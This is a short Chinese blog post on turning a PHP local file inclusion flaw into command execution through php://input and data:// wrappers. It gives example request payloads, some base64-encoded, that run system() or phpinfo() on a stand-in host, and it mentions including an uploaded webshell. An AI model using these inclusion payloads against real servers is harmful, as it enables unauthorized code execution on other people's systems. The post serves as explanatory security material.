侧边栏壁纸
博主头像
落叶人生博主等级

走进秋风,寻找秋天的落叶

  • 累计撰写 130562 篇文章
  • 累计创建 28 个标签
  • 累计收到 9 条评论
标签搜索

目 录CONTENT

文章目录

LFI 命令执行

2023-04-25 星期二 / 0 评论 / 0 点赞 / 68 阅读 / 920 字

条件:【条件】在allow_url_include = On 且 PHP >= 5.2.0【优势】直接POST php代码并执行【须知】必须使用包含切执行函数(比如 include require)

.

条件:

【条件】在allow_url_include = On 且 PHP >= 5.2.0

【优势】直接POST php代码并执行

【须知】必须使用包含切执行函数(比如 include require) 不能使用file_get_contents等 用这些函数不会执行data/input里面函数。

【点评】这其实是一种思路而已  当allow_url_include打开的时候  随便找个webshell上传一句话都可以远程包含了。

php://input

0x007.com/data.php?a=php://input

post提交:<?php  system("set");?>  任意的php代码


data:

include $_GET['a'];

0x007.com/data.php?a=data:text/plain,<?php phpinfo();

0x007.com/data.php?a=data://text/plain;base64,PD9waHBpbmZvKCk7Lyo=

0x007.com/data.php?a=data:;base64,PD9waHBpbmZvKCk7Lyo=


.

广告 广告

评论区